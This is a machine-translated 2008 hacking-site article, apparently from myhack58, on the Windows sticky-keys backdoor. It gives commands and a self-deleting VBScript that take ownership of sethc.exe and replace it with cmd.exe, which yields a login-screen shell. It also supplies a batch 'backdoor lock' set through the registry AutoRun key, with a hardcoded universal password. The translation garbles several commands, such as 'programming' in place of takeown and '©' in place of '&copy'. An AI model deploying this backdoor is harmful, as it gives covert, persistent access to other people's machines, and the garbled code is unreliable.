Sticky keys to create the invasion of the Vista system burst cool Backdoor-vulnerability warning-the black bar safety net

ID MYHACK58:62200818938
Type myhack58
Reporter 佚名
Modified 2008-05-02T00:00:00


Source: the sun What is sticky keys? When you are in a Windows operating system inside the continuous press 5 times Shift key and after that you see out what? In windows 2 0 0 0/xp/Vista, press shift key 5 times, you can open the sticky position, 会运行sethc.exe and, in the login interface may also be open. It's reminiscent of a WINDOWS screensaver, the program will be replaced with cmd. exe, you can open the shell. A, concrete replacement method: XP system: The installation of the source disk pop-up(or on the hard disk the installation directory renamed) cd %widnir%\system32\dllcache ren sethc.exe *. ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe Vista system: programming /f c:\windows\system32\sethc.exe cacls c:\windows\system32\sethc.exe /G administrator:F

On two steps to obtain the permissions command, you can also through the Vista optimization guru to get the right-click menu of elevated function, and then in with. the exe file above, right-direct lift access. Then press the XP method of replacing the file At the login screen press 5 this SHIFT out cmd shell, and then...... Second, the back door of the extension: Dim obj, success Set obj = CreateObject("WScript. Shell") success = obj. run("cmd /c programming /f %SystemRoot%\system32\sethc.exe", 0, True) success = obj. run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) success = obj. run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) success = obj. run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) success = obj. run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) success = obj. run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) The second sentence is the most interesting, autoresponder.... 've encountered similar problems Then update, add a self-delete, simplify the Code: On Error Resume Next Dim obj, success Set obj = CreateObject("WScript. Shell") success = obj. run("cmd /c programming /f %SystemRoot%\system32\with. exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc. exe&del %SystemRoot%\system32\with. exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting. FileSystemObject"). DeleteFile(WScript. ScriptName) Third, the back door lock extensions:

allyesno Note: You can use the cmd lock to cmdshell Password Authentication Use the following back door lock of the method is to put the code save for bdlock. bat Then modify the registry location [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor] "AutoRun"="bdlock. bat" @Echo Off title back door login authentication color a cls set temprandom=%RANDOM% echo please enter the verification code:%temprandom% set/p check= if "%check%"=="%temprandom%%temprandom%" goto passcheck if "%check%"=="%temprandom%" ( rem Backdoor Server Authentication rem if there is no back door to the authentication server please rem comment fall line of code if exist \\trojandownloader$\pass goto passcheck ) echo verify failed pause exit :passcheck echo verification successful If "%passcmdlock%"== Goto endx Set passcmdlock=http://www. 6 6 5 5. com/ :allyesno Set Errorlevel=>nul Echo please enter the verification code? Set password=allyesno Is a pig>nul Set/p password= rem universal password if "%password%"=="allyesno is a sb" goto endx If %time:~1,1%==0 Set timechange=a If %time:~1,1%==1 Set timechange=b If %time:~1,1%==2 Set timechange=c If %time:~1,1%==3 Set timechange=d If %time:~1,1%==4 Set timechange=e If %time:~1,1%==5 Set timechange=f If %time:~1,1%==6 Set timechange=g If %time:~1,1%==7 Set timechange=h If %time:~1,1%==8 Set timechange=i If %time:~1,1%==9 Set timechange=j set/a sum=%time:~1,1%+%time:~1,1% Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul If "%errorlevel%"=="0" cls&Echo the password is correct&Goto End Echo please contact for the correct password!& amp;Goto allyesno :End Set password=>nul Set Errorlevel=>nul :endx